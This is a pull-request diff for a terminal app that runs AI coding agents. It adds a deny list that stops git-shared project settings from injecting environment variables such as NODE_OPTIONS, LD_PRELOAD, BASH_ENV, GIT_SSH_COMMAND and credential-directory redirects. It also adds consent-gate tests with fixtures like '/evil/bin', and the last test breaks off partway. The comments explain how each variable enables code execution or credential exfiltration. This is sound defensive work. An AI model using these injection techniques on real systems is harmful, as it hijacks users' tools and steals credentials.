### PR TITLE
feat(project-settings): consume per-project agent launch/env + terminal overrides

### DIFF
--- a/src/core/claude-accounts-core.ts
+++ b/src/core/claude-accounts-core.ts
@@ -176,6 +176,36 @@ export const AUTH_ENV_STRIP = [
   'CLAUDE_CODE_OAUTH_TOKEN'
 ] as const
 
+/**
+ * Env keys a PROJECT's settings document may never contribute to a spawn, however it is sourced
+ * and however it was consented to (`makeProjectSpawnOverrides` → `PtyManager.spawnSession`, both
+ * the local merge and the ssh `remoteEnvPairs` join).
+ *
+ * WHY, given the value already passed a trust dialog: consent proves a human saw the PAIRS, not
+ * that they understood what each one out-ranks. A project's settings.json is a git-shared file —
+ * one commit reaches every clone — and it is merged AFTER the three layers whose entire job is to
+ * control these exact names:
+ *  - `AUTH_ENV_STRIP` is DELETED from the env when a managed account is selected, precisely so an
+ *    inherited API key cannot shadow that account's OAuth login. A project re-adding one silently
+ *    routes the session's traffic to a third party.
+ *  - `CLAUDE_CONFIG_DIR` is where the agent reads and WRITES credentials. Redirected into the repo
+ *    (`./.tooling` reads like a build directory) it becomes a credential exfiltration path.
+ *  - `NODETERM_*` is the hook channel's own identity and capability advertisement — endpoint, node
+ *    id, token, permission-wait. Forging any of them lets one node speak as another.
+ * Nothing here is a value a project legitimately needs to set; a project that wants its own auth
+ * belongs in a custom agent, which is per-machine configuration the user typed themselves.
+ *
+ * Filtered SILENTLY at the merge — a spawn is not a place to raise a second question. (Surfacing
+ * the skipped keys in the project settings panel is left to the observability wave.)
+ */
+export function isReservedSpawnEnvKey(key: string): boolean {
+  return (
+    key.startsWith('NODETERM_') ||
+    key === 'CLAUDE_CONFIG_DIR' ||
+    (AUTH_ENV_STRIP as readonly string[]).includes(key)
+  )
+}
+
 /** tmux `-e` pair injecting the account config dir (shared server → per-session env). */
 export function accountTmuxEnvArgs(configDir: string): string[] {
   return ['-e', `CLAUDE_CONFIG_DIR=${configDir}`]

--- a/src/core/claude-accounts-core.ts
+++ b/src/core/claude-accounts-core.ts
@@ -212,21 +212,36 @@ const AGENT_CONFIG_DIR_ENV: readonly string[] = ['CLAUDE_CONFIG_DIR', 'CODEX_HOM
  *    in it. Custom-agent env may still set these — that is the documented proxy use case.
  *  - `NODETERM_*` is the hook channel's own identity and capability advertisement — endpoint, node
  *    id, token, permission-wait. Forging any of them lets one node speak as another.
+ *  - `NODE_OPTIONS` — `--require /repo/x.js` loads arbitrary JavaScript into every node-based CLI
+ *    (claude first among them) at interpreter start. Same class as the opencode-plugin path above,
+ *    and stealthier than PATH: the process still IS the real claude, from the real location, so
+ *    nothing downstream — not the pane, not the identity probe — can tell. The dialog shows a flag
+ *    string; the grant is code execution.
  *
- * WHAT IS DELIBERATELY *NOT* HERE — `PATH`, `NODE_OPTIONS`, and every ordinary application variable.
- * Pointing a project's terminals at its own tooling IS this feature's purpose, and a consent dialog
- * conveys those pairs perfectly well: a reader sees the directory or the flag and can judge it. The
- * reserved list exists only for keys whose implications a dialog CANNOT convey — a credential
- * directory, a silent traffic redirect, a hook identity — where what is shown ("a path", "a URL")
- * and what is granted are different things. The line is legibility, not danger; a project that
- * wants its own auth belongs in a custom agent.
+ * WHAT IS DELIBERATELY *NOT* HERE — `PATH`, and every ordinary application variable. Approving
+ * `PATH=./bin` is a COHERENT consent: "this project's terminals resolve tools from the repo" is the
+ * feature's stated purpose, and the hijack it enables still requires committing a visible binary
+ * that a reviewer can see in the tree. `NODE_OPTIONS` fails exactly that test, which is why it sits
+ * above and PATH does not — it smuggles execution into a binary the user believes untouched.
+ *
+ * The reserved list exists only for keys whose implications a dialog CANNOT convey — a credential
+ * directory, a silent traffic redirect, a hook identity, an interpreter preload — where what is
+ * shown ("a path", "a URL", "a flag") and what is granted are different things. The line is
+ * legibility, not danger; a project that wants its own auth belongs in a custom agent.
  *
  * SCOPE, precisely: this filters the project's contribution — BOTH halves of it, the git-shared
  * document AND this machine's local overlay. That is broader than the hostile-input argument
  * strictly requires, and it is the deliberate trade: one rule is auditable where "reserved unless
- * it came from the overlay" would be a provenance check on every key, at the spawn, forever. A user
- * who genuinely wants one of these names on this machine sets it in custom-agent env, which is
- * per-machine configuration they typed themselves and is merged after (and over) this.
+ * it came from the overlay" would be a provenance check on every key, at the spawn, forever.
+ *
+ * The same overreach applies by AGENT: `XDG_CONFIG_HOME` is reserved for every pane, including a
+ * plain terminal that launches no agent at all and where the opencode-plugin hazard cannot arise.
+ * Kept anyway, for the same one-auditable-rule reason — the alternative is a per-agent reserved list
+ * evaluated at the spawn, and a pane's agent can change under it. The honest cost: someone who
+ * wanted to point a project's shells at repo-local dotfiles through project env cannot, and the
+ * local overlay is no workaround because this filter covers that too. What is left is custom-agent
+ * env (per-machine configuration the user typed themselves, merged after and over this) for an agent
+ * pane, or the shell's own rc for a plain one.
  *
  * Filtered SILENTLY at the merge — a spawn is not a place to raise a second question. So a dropped
  * key is currently invisible to its author; surfacing the skipped keys in the project settings
@@ -235,6 +250,7 @@ const AGENT_CONFIG_DIR_ENV: readonly string[] = ['CLAUDE_CONFIG_DIR', 'CODEX_HOM
 export function isReservedSpawnEnvKey(key: string): boolean {
   return (
     key.startsWith('NODETERM_') ||
+    key === 'NODE_OPTIONS' ||
     AGENT_CONFIG_DIR_ENV.includes(key) ||
     (AUTH_ENV_STRIP as readonly string[]).includes(key) ||
     (MODEL_GATEWAY_ENV_KEYS as readonly string[]).includes(key)

--- a/src/core/claude-accounts-core.ts
+++ b/src/core/claude-accounts-core.ts
@@ -182,6 +182,42 @@ export const AUTH_ENV_STRIP = [
 const AGENT_CONFIG_DIR_ENV: readonly string[] = ['CLAUDE_CONFIG_DIR', 'CODEX_HOME', 'XDG_CONFIG_HOME']
 
 /**
+ * Names that make a program EXECUTE something it was never asked to, without changing which program
+ * was launched. `NODE_OPTIONS`'s exact reserve-reason, one interpreter down and one shell over —
+ * three mechanisms, one list because they are one hazard (see `isReservedSpawnEnvKey`'s clause):
+ *  - `LD_PRELOAD` / `LD_AUDIT` / `LD_LIBRARY_PATH` — the Linux dynamic loader loads a repo-supplied
+ *    `.so` into the CLI's own address space before `main` runs.
+ *  - `DYLD_INSERT_LIBRARIES` / `DYLD_LIBRARY_PATH` — the macOS equivalent. macOS strips DYLD_* only
+ *    across a SIP-protected or hardened-runtime boundary, and a node/agent CLI is neither: it is a
+ *    script run by the user's own `node`, so the pair applies exactly as on Linux.
+ *  - `BASH_ENV` / `ENV` — sourced by a NON-interactive shell at startup, which is precisely the
+ *    shell every launch line runs in; the file runs before the agent's first byte.
+ *  - `GIT_SSH_COMMAND` / `GIT_EXTERNAL_DIFF` — git runs the named command verbatim the moment the
+ *    agent (or the user) shells out to git, which an agent pane does constantly.
+ * Every one of them renders as an innocuous path or command string in the consent table while
+ * granting arbitrary execution inside a binary the user believes untouched — the NODE_OPTIONS
+ * bucket, not the PATH bucket. Spec §2 names LD_PRELOAD as attack surface by name.
+ *
+ * Honest cost, same shape as the `XDG_CONFIG_HOME` overreach documented below: `ENV` and
+ * `LD_LIBRARY_PATH` are ALSO ordinary application variables (a project that genuinely wanted
+ * `LD_LIBRARY_PATH=./vendor/lib` for its own toolchain cannot set it through project env, and must
+ * use custom-agent env or the shell's rc instead). Kept, because a per-key "is this one being used
+ * innocently?" judgement is not something the merge point can make, and the failure direction of
+ * guessing wrong is arbitrary code execution.
+ */
+const INJECTION_ENV: readonly string[] = [
+  'LD_PRELOAD',
+  'LD_AUDIT',
+  'LD_LIBRARY_PATH',
+  'DYLD_INSERT_LIBRARIES',
+  'DYLD_LIBRARY_PATH',
+  'GIT_SSH_COMMAND',
+  'GIT_EXTERNAL_DIFF',
+  'BASH_ENV',
+  'ENV'
+]
+
+/**
  * Env keys a PROJECT's settings document may never contribute to a spawn, however it is sourced
  * and however it was consented to (`makeProjectSpawnOverrides` → `PtyManager.spawnSession`, both
  * the local merge and the ssh `remoteEnvPairs` join).
@@ -217,6 +253,12 @@ const AGENT_CONFIG_DIR_ENV: readonly string[] = ['CLAUDE_CONFIG_DIR', 'CODEX_HOM
  *    and stealthier than PATH: the process still IS the real claude, from the real location, so
  *    nothing downstream — not the pane, not the identity probe — can tell. The dialog shows a flag
  *    string; the grant is code execution.
+ *  - `INJECTION_ENV` — the same grant through the DYNAMIC LOADER (`LD_PRELOAD` and friends; the
+ *    macOS `DYLD_*` pair, which a non-SIP-protected node/agent CLI honors just as Linux does), the
+ *    NON-interactive shell's own startup file (`BASH_ENV` / `ENV`, sourced by the very shell the
+ *    launch line runs in), and git's command hooks (`GIT_SSH_COMMAND` / `GIT_EXTERNAL_DIFF`, run
+ *    verbatim as soon as the agent shells out to git). One reserve-reason with NODE_OPTIONS: the
+ *    process still IS the real CLI, from the real location, and the table showed "a path".
  *
  * WHAT IS DELIBERATELY *NOT* HERE — `PATH`, and every ordinary application variable. Approving
  * `PATH=./bin` is a COHERENT consent: "this project's terminals resolve tools from the repo" is the
@@ -251,6 +293,7 @@ export function isReservedSpawnEnvKey(key: string): boolean {
   return (
     key.startsWith('NODETERM_') ||
     key === 'NODE_OPTIONS' ||
+    INJECTION_ENV.includes(key) ||
     AGENT_CONFIG_DIR_ENV.includes(key) ||
     (AUTH_ENV_STRIP as readonly string[]).includes(key) ||
     (MODEL_GATEWAY_ENV_KEYS as readonly string[]).includes(key)

--- a/src/core/claude-accounts-core.ts
+++ b/src/core/claude-accounts-core.ts
@@ -177,6 +177,10 @@ export const AUTH_ENV_STRIP = [
   'CLAUDE_CODE_OAUTH_TOKEN'
 ] as const
 
+/** Where each supported agent keeps its config, credentials and (for opencode) its plugin code.
+ *  One list because they are one hazard — see `isReservedSpawnEnvKey`'s clause on them. */
+const AGENT_CONFIG_DIR_ENV: readonly string[] = ['CLAUDE_CONFIG_DIR', 'CODEX_HOME', 'XDG_CONFIG_HOME']
+
 /**
  * Env keys a PROJECT's settings document may never contribute to a spawn, however it is sourced
  * and however it was consented to (`makeProjectSpawnOverrides` → `PtyManager.spawnSession`, both
@@ -189,27 +193,49 @@ export const AUTH_ENV_STRIP = [
  *  - `AUTH_ENV_STRIP` is DELETED from the env when a managed account is selected, precisely so an
  *    inherited API key cannot shadow that account's OAuth login. A project re-adding one silently
  *    routes the session's traffic to a third party.
- *  - `CLAUDE_CONFIG_DIR` is where the agent reads and WRITES credentials. Redirected into the repo
- *    (`./.tooling` reads like a build directory) it becomes a credential exfiltration path.
+ *  - AGENT CONFIG DIRS — one clause, three names, because every supported agent has one and a repo
+ *    naming any of them redirects that agent's credentials or code loading into itself. All three
+ *    read like build directories (`./.tooling`) in a consent table:
+ *      · `CLAUDE_CONFIG_DIR` — where claude reads and WRITES credentials (the account path sets it).
+ *      · `CODEX_HOME` — the same for codex (`auth.json` lives there; this app emits it in
+ *        `usage/codex-usage.ts`, and the launched pane resolves it from its OWN environment, see
+ *        `codex-identity-proxy.ts`), so a repo-supplied value captures codex's auth writes.
+ *      · `XDG_CONFIG_HOME` — opencode is XDG-respecting and loads its plugins from
+ *        `$XDG_CONFIG_HOME/opencode` (`agents/hooks/opencode.ts`), which is where THIS app installs
+ *        its managed plugin. A repo pointing that at itself is arbitrary JavaScript executed inside
+ *        the agent process — the worst of the three, and the least legible as an env pair.
  *  - `MODEL_GATEWAY_ENV_KEYS` — the provider ROUTING vars (`ANTHROPIC_BASE_URL`, `OPENAI_BASE_URL`,
  *    `COPILOT_PROVIDER_BASE_URL`, and the keys that travel with them). A base URL redirects the
  *    CLI's traffic — carrying the USER's own credentials — to an attacker-chosen endpoint, and
  *    "a URL" reads innocuous in a consent table. This list is the demonstration, not a guess: it is
  *    what THIS app emits to re-route each launched CLI, so those CLIs are known to honor every name
- *    in it. LOCAL custom-agent config may still set these (that is the documented proxy use case) —
- *    this predicate governs PROJECT env, which is repo-supplied input, not user configuration.
+ *    in it. Custom-agent env may still set these — that is the documented proxy use case.
  *  - `NODETERM_*` is the hook channel's own identity and capability advertisement — endpoint, node
  *    id, token, permission-wait. Forging any of them lets one node speak as another.
- * Nothing here is a value a project legitimately needs to set; a project that wants its own auth
- * belongs in a custom agent, which is per-machine configuration the user typed themselves.
  *
- * Filtered SILENTLY at the merge — a spawn is not a place to raise a second question. (Surfacing
- * the skipped keys in the project settings panel is left to the observability wave.)
+ * WHAT IS DELIBERATELY *NOT* HERE — `PATH`, `NODE_OPTIONS`, and every ordinary application variable.
+ * Pointing a project's terminals at its own tooling IS this feature's purpose, and a consent dialog
+ * conveys those pairs perfectly well: a reader sees the directory or the flag and can judge it. The
+ * reserved list exists only for keys whose implications a dialog CANNOT convey — a credential
+ * directory, a silent traffic redirect, a hook identity — where what is shown ("a path", "a URL")
+ * and what is granted are different things. The line is legibility, not danger; a project that
+ * wants its own auth belongs in a custom agent.
+ *
+ * SCOPE, precisely: this filters the project's contribution — BOTH halves of it, the git-shared
+ * document AND this machine's local overlay. That is broader than the hostile-input argument
+ * strictly requires, and it is the deliberate trade: one rule is auditable where "reserved unless
+ * it came from the overlay" would be a provenance check on every key, at the spawn, forever. A user
+ * who genuinely wants one of these names on this machine sets it in custom-agent env, which is
+ * per-machine configuration they typed themselves and is merged after (and over) this.
+ *
+ * Filtered SILENTLY at the merge — a spawn is not a place to raise a second question. So a dropped
+ * key is currently invisible to its author; surfacing the skipped keys in the project settings
+ * panel is left to the observability wave.
  */
 export function isReservedSpawnEnvKey(key: string): boolean {
   return (
     key.startsWith('NODETERM_') ||
-    key === 'CLAUDE_CONFIG_DIR' ||
+    AGENT_CONFIG_DIR_ENV.includes(key) ||
     (AUTH_ENV_STRIP as readonly string[]).includes(key) ||
     (MODEL_GATEWAY_ENV_KEYS as readonly string[]).includes(key)
   )

--- a/src/core/claude-accounts-core.ts
+++ b/src/core/claude-accounts-core.ts
@@ -2,6 +2,7 @@
 // everything here is unit-tested; the impure lifecycle lives in claude-accounts.ts.
 import { createHash } from 'crypto'
 import path from 'path'
+import { MODEL_GATEWAY_ENV_KEYS } from '../shared/agents/model-gateway'
 
 /** Shape of a valid account id (uuid / opaque token). Shared by every path builder so a bad id
  *  can never traverse out of the accounts root — locally OR on a remote host over ssh. */
@@ -190,6 +191,13 @@ export const AUTH_ENV_STRIP = [
  *    routes the session's traffic to a third party.
  *  - `CLAUDE_CONFIG_DIR` is where the agent reads and WRITES credentials. Redirected into the repo
  *    (`./.tooling` reads like a build directory) it becomes a credential exfiltration path.
+ *  - `MODEL_GATEWAY_ENV_KEYS` — the provider ROUTING vars (`ANTHROPIC_BASE_URL`, `OPENAI_BASE_URL`,
+ *    `COPILOT_PROVIDER_BASE_URL`, and the keys that travel with them). A base URL redirects the
+ *    CLI's traffic — carrying the USER's own credentials — to an attacker-chosen endpoint, and
+ *    "a URL" reads innocuous in a consent table. This list is the demonstration, not a guess: it is
+ *    what THIS app emits to re-route each launched CLI, so those CLIs are known to honor every name
+ *    in it. LOCAL custom-agent config may still set these (that is the documented proxy use case) —
+ *    this predicate governs PROJECT env, which is repo-supplied input, not user configuration.
  *  - `NODETERM_*` is the hook channel's own identity and capability advertisement — endpoint, node
  *    id, token, permission-wait. Forging any of them lets one node speak as another.
  * Nothing here is a value a project legitimately needs to set; a project that wants its own auth
@@ -202,7 +210,8 @@ export function isReservedSpawnEnvKey(key: string): boolean {
   return (
     key.startsWith('NODETERM_') ||
     key === 'CLAUDE_CONFIG_DIR' ||
-    (AUTH_ENV_STRIP as readonly string[]).includes(key)
+    (AUTH_ENV_STRIP as readonly string[]).includes(key) ||
+    (MODEL_GATEWAY_ENV_KEYS as readonly string[]).includes(key)
   )
 }
 

--- a/src/core/project-launch-info-handlers.ts
+++ b/src/core/project-launch-info-handlers.ts
@@ -1,13 +1,12 @@
 import { IPC } from '../shared/ipc'
 import {
-  projectTrustContent,
   resolveProjectSettings,
   type ProjectLaunchInfo,
-  type ProjectSettingsDoc,
-  type ProjectTrustFamily
+  type ProjectSettingsDoc
 } from '../shared/project-settings'
 import type { CorePlatform } from './platform'
-import { hashTrustContent, localTrustKey, sshTrustKey, type ProjectTrustStore } from './project-trust-store'
+import type { ProjectTrustStore } from './project-trust-store'
+import { projectFamilyTrusted, projectTrustKeyFor } from './project-trust-verdict'
 import type { WorkspaceStore } from './workspace-store'
 
 /**
@@ -39,19 +38,14 @@ export function registerProjectLaunchInfoHandlers(
       const info = workspaceStore.projectTargetInfo(projectId)
       const sharedDoc: ProjectSettingsDoc = snap.shared ?? {}
       const resolved = resolveProjectSettings(snap.local, snap.shared ?? undefined)
-      // A cwd-less inline canvas falls to `localTrustKey('')` — inert by construction: such a
-      // project has no shared document to have, so `sharedDoc` is always `{}` and every family's
-      // `projectTrustContent` already returns null before this key is ever consulted.
-      const key = info?.ssh
-        ? sshTrustKey({ server: info.ssh.server, remoteCwd: info.ssh.remoteCwd })
-        : localTrustKey(info?.cwd ?? '')
-      const trustedFor = async (family: ProjectTrustFamily): Promise<boolean> => {
-        const content = projectTrustContent(family, sharedDoc)
-        // No shared executable content for this family — nothing to gate.
-        if (content === null) return true
-        return trustStore.isTrusted(key, family, hashTrustContent(content))
+      // The verdict itself lives in `project-trust-verdict.ts`, shared with the SPAWN's own reader
+      // (`makeProjectSpawnOverrides`): a renderer told "trusted" here while the spawn silently
+      // drops the same value would be a gate that reports one thing and enforces another.
+      const key = projectTrustKeyFor(info)
+      const trusted = {
+        agents: await projectFamilyTrusted(trustStore, key, 'agents', sharedDoc),
+        shell: await projectFamilyTrusted(trustStore, key, 'shell', sharedDoc)
       }
-      const trusted = { agents: await trustedFor('agents'), shell: await trustedFor('shell') }
       return { resolved, trusted }
     }
   )

--- a/src/core/project-launch-info-handlers.ts
+++ b/src/core/project-launch-info-handlers.ts
@@ -1,0 +1,55 @@
+import { IPC } from '../shared/ipc'
+import {
+  projectTrustContent,
+  resolveProjectSettings,
+  type ProjectLaunchInfo,
+  type ProjectSettingsDoc,
+  type ProjectTrustFamily
+} from '../shared/project-settings'
+import type { CorePlatform } from './platform'
+import { hashTrustContent, localTrustKey, sshTrustKey, type ProjectTrustStore } from './project-trust-store'
+import type { WorkspaceStore } from './workspace-store'
+
+/**
+ * `project-settings:launch-info` — the single read a launcher warms before it may consume a
+ * shared-sourced value out of `resolveProjectSettings`'s answer (SDD: consumption plan, Task 1).
+ *
+ * A SIBLING `register*` (the `project-setup-handlers.ts` shape), not a widening of
+ * `WorkspaceStore.registerIpc()`: the store has no trust-store dependency anywhere else, and giving
+ * it one just to serve this one channel would spread the trust boundary across a file that
+ * currently has none. Both shells already construct a `ProjectTrustStore` (main/server wiring) and
+ * call a sibling `register*Handlers` for the setup runner right next to it — this follows the same
+ * construction-order point.
+ *
+ * Only `agents`/`shell` are reported (not `setup`, though it is a `ProjectTrustFamily` too) —
+ * `setup` already has its own gate at RUN time in `project-setup-service.ts`; this channel is for
+ * consumers that need to know ahead of a launch, not another copy of that gate.
+ */
+export function registerProjectLaunchInfoHandlers(
+  platform: CorePlatform,
+  workspaceStore: Pick<WorkspaceStore, 'readProjectSettings' | 'projectTargetInfo'>,
+  trustStore: ProjectTrustStore
+): void {
+  platform.handle(
+    IPC.projectSettingsLaunchInfo,
+    async (projectId: unknown): Promise<ProjectLaunchInfo | null> => {
+      if (typeof projectId !== 'string' || !projectId) return null
+      const snap = await workspaceStore.readProjectSettings(projectId)
+      if (!snap) return null
+      const info = workspaceStore.projectTargetInfo(projectId)
+      const sharedDoc: ProjectSettingsDoc = snap.shared ?? {}
+      const resolved = resolveProjectSettings(snap.local, snap.shared ?? undefined)
+      const key = info?.ssh
+        ? sshTrustKey({ server: info.ssh.server, remoteCwd: info.ssh.remoteCwd })
+        : localTrustKey(info?.cwd ?? '')
+      const trustedFor = async (family: ProjectTrustFamily): Promise<boolean> => {
+        const content = projectTrustContent(family, sharedDoc)
+        // No shared executable content for this family — nothing to gate.
+        if (content === null) return true
+        return trustStore.isTrusted(key, family, hashTrustContent(content))
+      }
+      const trusted = { agents: await trustedFor('agents'), shell: await trustedFor('shell') }
+      return { resolved, trusted }
+    }
+  )
+}

--- a/src/core/project-launch-info-handlers.ts
+++ b/src/core/project-launch-info-handlers.ts
@@ -39,6 +39,9 @@ export function registerProjectLaunchInfoHandlers(
       const info = workspaceStore.projectTargetInfo(projectId)
       const sharedDoc: ProjectSettingsDoc = snap.shared ?? {}
       const resolved = resolveProjectSettings(snap.local, snap.shared ?? undefined)
+      // A cwd-less inline canvas falls to `localTrustKey('')` — inert by construction: such a
+      // project has no shared document to have, so `sharedDoc` is always `{}` and every family's
+      // `projectTrustContent` already returns null before this key is ever consulted.
       const key = info?.ssh
         ? sshTrustKey({ server: info.ssh.server, remoteCwd: info.ssh.remoteCwd })
         : localTrustKey(info?.cwd ?? '')

--- a/src/core/project-setup-handlers.ts
+++ b/src/core/project-setup-handlers.ts
@@ -46,6 +46,30 @@ export interface ProjectSetupHandlerDeps {
 
 const isKind = (v: unknown): v is ProjectSetupKind => v === 'setup' || v === 'archive'
 
+/**
+ * "Make sure this project's `<family>` is trusted", by project id alone — the derivation shared by
+ * the `projectSetupRequestTrust` channel below and by the SPAWN's own reader
+ * (`makeProjectSpawnOverrides`, wired in main/server). Same trust boundary as `run`: rootPath /
+ * projectName / ssh come from THIS process's workspace index, never from a caller.
+ *
+ * No worktree argument at all — trust is keyed to the project ROOT (a worktree inherits the root's
+ * approval), so there is no path-shaped input to validate. Answers `false` when the project cannot
+ * be resolved or the service has no gate; never throws.
+ */
+export function makeProjectTrustRequester(
+  service: ProjectSetupHandlerService,
+  deps: ProjectSetupHandlerDeps
+): (projectId: string, family: ProjectConsumerFamily) => Promise<boolean> {
+  return async (projectId, family) => {
+    const ask = service.ensureFamilyTrusted?.bind(service)
+    if (!ask) return false
+    const info = deps.projectTargetInfo(projectId)
+    const target = await resolveProjectSetupTarget(projectId, undefined, info, deps.worktreeList)
+    if (!target) return false
+    return ask(target, family)
+  }
+}
+
 export function registerProjectSetupHandlers(
   platform: CorePlatform,
   service: ProjectSetupHandlerService,
@@ -66,6 +90,7 @@ export function registerProjectSetupHandlers(
       return service.run(target, kind)
     }
   )
+  const requestTrust = makeProjectTrustRequester(service, deps)
   platform.handle(
     IPC.projectSetupRequestTrust,
     async (projectId: unknown, family: unknown): Promise<boolean> => {
@@ -73,14 +98,7 @@ export function registerProjectSetupHandlers(
       // would hand a caller a run-less way to raise (and then answer) the host's setup dialog.
       if (typeof projectId !== 'string' || !projectId) return false
       if (family !== 'agents' && family !== 'shell') return false
-      const ask = service.ensureFamilyTrusted?.bind(service)
-      if (!ask) return false
-      // Same derivation as `run`, minus the worktree: trust is keyed to the project ROOT (a
-      // worktree inherits the root's approval), so there is no path-shaped argument at all here.
-      const info = deps.projectTargetInfo(projectId)
-      const target = await resolveProjectSetupTarget(projectId, undefined, info, deps.worktreeList)
-      if (!target) return false
-      return ask(target, family)
+      return requestTrust(projectId, family)
     }
   )
   platform.handle(IPC.projectSetupCancel, (runKey: unknown) =>

--- a/src/core/project-setup-handlers.ts
+++ b/src/core/project-setup-handlers.ts
@@ -2,7 +2,7 @@ import { IPC } from '../shared/ipc'
 import type { ProjectSetupConsentAnswer, ProjectSetupKind, ProjectSetupRunResult } from '../shared/project-settings'
 import type { WorktreeListResult } from '../shared/worktree'
 import type { CorePlatform } from './platform'
-import type { ProjectSetupTarget } from './project-setup-service'
+import type { ProjectConsumerFamily, ProjectSetupTarget } from './project-setup-service'
 import { resolveProjectSetupTarget, type ProjectSetupTargetInfo } from './project-setup-runner-local'
 
 /**
@@ -27,6 +27,11 @@ export interface ProjectSetupHandlerService {
   run(target: ProjectSetupTarget, kind: ProjectSetupKind): Promise<ProjectSetupRunResult>
   cancel(runKey: string): boolean
   submitConsent(requestId: string, answer: ProjectSetupConsentAnswer): void
+  /** The launch-settings gate (`ProjectSetupService.ensureFamilyTrusted`). OPTIONAL so a service
+   *  built against the run-only surface still registers; the channel is registered either way and
+   *  simply answers `false` — fail closed, never a missing-handler rejection a caller has to
+   *  special-case. */
+  ensureFamilyTrusted?(target: ProjectSetupTarget, family: ProjectConsumerFamily): Promise<boolean>
 }
 
 /** What `registerProjectSetupHandlers` needs from its shell to resolve a trusted target — the
@@ -59,6 +64,23 @@ export function registerProjectSetupHandlers(
       const target = await resolveProjectSetupTarget(projectId, worktreePath, info, deps.worktreeList)
       if (!target) return { status: 'skipped', reason: 'unavailable' }
       return service.run(target, kind)
+    }
+  )
+  platform.handle(
+    IPC.projectSetupRequestTrust,
+    async (projectId: unknown, family: unknown): Promise<boolean> => {
+      // `setup` is NOT accepted: that family is gated inside `run` itself, and admitting it here
+      // would hand a caller a run-less way to raise (and then answer) the host's setup dialog.
+      if (typeof projectId !== 'string' || !projectId) return false
+      if (family !== 'agents' && family !== 'shell') return false
+      const ask = service.ensureFamilyTrusted?.bind(service)
+      if (!ask) return false
+      // Same derivation as `run`, minus the worktree: trust is keyed to the project ROOT (a
+      // worktree inherits the root's approval), so there is no path-shaped argument at all here.
+      const info = deps.projectTargetInfo(projectId)
+      const target = await resolveProjectSetupTarget(projectId, undefined, info, deps.worktreeList)
+      if (!target) return false
+      return ask(target, family)
     }
   )
   platform.handle(IPC.projectSetupCancel, (runKey: unknown) =>

--- a/src/core/project-setup-service.test.ts
+++ b/src/core/project-setup-service.test.ts
@@ -11,6 +11,7 @@ import {
   type ProjectSettingsFileV1,
   type ProjectSettingsSnapshot,
   type ProjectLocalSettings,
+  type ProjectConsentRequest,
   type ProjectSetupConsentRequest,
   type ProjectSetupEvent,
   type ProjectSetupRunResult
@@ -734,5 +735,231 @@ describe('ProjectSetupService — disposeAll', () => {
     expect(s[1]).toEqual({ channel: IPC.projectSetupConsentDismiss, payload: { requestId } })
     expect(await pending).toEqual({ status: 'skipped', reason: 'declined' })
     expect(calls).toHaveLength(0)
+  })
+})
+
+/**
+ * `ensureFamilyTrusted` — the SAME gate as the setup runner's, aimed at the two families nothing in
+ * this service executes: `agents` (launchCmd + env) and `shell` (the terminal program). A launcher
+ * asks before it consumes a shared-sourced value; the answer is recorded per FAMILY, at the
+ * LOCATION, and every asker's project is told to re-read its verdict.
+ */
+describe('ProjectSetupService — ensureFamilyTrusted', () => {
+  const familyPrompts = (family: 'agents' | 'shell'): ProjectConsentRequest[] =>
+    plat.sent
+      .filter((s) => s.channel === IPC.projectSetupConsentRequest)
+      .map((s) => s.args[0] as ProjectConsentRequest)
+      .filter((r) => r.family === family)
+
+  const trustChanged = (): string[] =>
+    plat.sent
+      .filter((s) => s.channel === IPC.projectTrustChanged)
+      .map((s) => (s.args[0] as { projectId: string }).projectId)
+
+  const agentsDoc: ProjectSettingsDoc = {
+    agents: { launchCmd: 'claude --mcp evil', env: { API_KEY: 'sk-1', PATH: '/evil/bin' } }
+  }
+
+  it('is promptless when the SHARED document has nothing executable in that family', async () => {
+    const trust = new ProjectTrustStore()
+    const svc = new ProjectSetupService({
+      trust,
+      // A LOCAL launchCmd is the user's own instruction and the shared doc sets nothing — there is
+      // no hostile input to gate, so a dialog here would be asking about the user's own typing.
+      readSettings: async () => snapshot(sharedFile({}), { agents: { launchCmd: 'mine' } })
+    })
+    expect(await svc.ensureFamilyTrusted(target(), 'agents')).toBe(true)
+    expect(await svc.ensureFamilyTrusted(target(), 'shell')).toBe(true)
+    expect(familyPrompts('agents')).toEqual([])
+    expect(familyPrompts('shell')).toEqual([])
+    expect(trustChanged()).toEqual([])
+  })
+
+  it('prompts with the whole agents family, and an approve records THE FAMILY hash + broadcasts', async () => {
+    const trust = new ProjectTrustStore()
+    const svc = new ProjectSetupService({ trust, readSettings: async () => snapshot(sharedFile(agentsDoc)) })
+    const pending = svc.ensureFamilyTrusted(target(), 'agents')
+    await vi.waitFor(() => expect(familyPrompts('agents')).toHaveLength(1))
+    const req = familyPrompts('agents')[0]
+    expect(req).toMatchObject({
+      family: 'agents',
+      projectName: 'App',
+      previouslyApproved: false,
+      launchCmd: 'claude --mcp evil',
+      // env is inside the hash (PATH/LD_PRELOAD hijack), so it is inside the question.
+      env: { API_KEY: 'sk-1', PATH: '/evil/bin' }
+    })
+    expect(req.locationLabel).toContain('/proj/app')
+
+    svc.submitConsent(req.requestId, 'approve')
+    expect(await pending).toBe(true)
+    const hash = hashTrustContent(projectTrustContent('agents', agentsDoc)!)
+    expect(await trust.isTrusted(localTrustKey('/proj/app'), 'agents', hash)).toBe(true)
+    // Per family: approving the launch settings approves NOTHING about the setup scripts.
+    expect(await trust.getRecord(localTrustKey('/proj/app'), 'setup')).toBeNull()
+    expect(trustChanged()).toEqual(['p1'])
+
+    // Already trusted → the next ask is promptless.
+    expect(await svc.ensureFamilyTrusted(target(), 'agents')).toBe(true)
+    expect(familyPrompts('agents')).toHaveLength(1)
+  })
+
+  it('a skip records nothing, broadcasts nothing and answers false', async () => {
+    const trust = new ProjectTrustStore()
+    const svc = new ProjectSetupService({ trust, readSettings: async () => snapshot(sharedFile(agentsDoc)) })
+    const pending = svc.ensureFamilyTrusted(target(), 'agents')
+    await vi.waitFor(() => expect(familyPrompts('agents')).toHaveLength(1))
+    svc.submitConsent(familyPrompts('agents')[0].requestId, 'skip')
+    expect(await pending).toBe(false)
+    expect(await trust.getRecord(localTrustKey('/proj/app'), 'agents')).toBeNull()
+    expect(trustChanged()).toEqual([])
+  })
+
+  it('an unanswered prompt expires: false, dismissed, nothing recorded — never a retroactive yes', async () => {
+    vi.useFakeTimers({ shouldAdvanceTime: true })
+    const trust = new ProjectTrustStore()
+    const svc = new ProjectSetupService({ trust, readSettings: async () => snapshot(sharedFile(agentsDoc)) })
+    const pending = svc.ensureFamilyTrusted(target(), 'agents')
+    await vi.waitFor(() => expect(familyPrompts('agents')).toHaveLength(1))
+    const { requestId } = familyPrompts('agents')[0]
+
+    await vi.advanceTimersByTimeAsync(299_000)
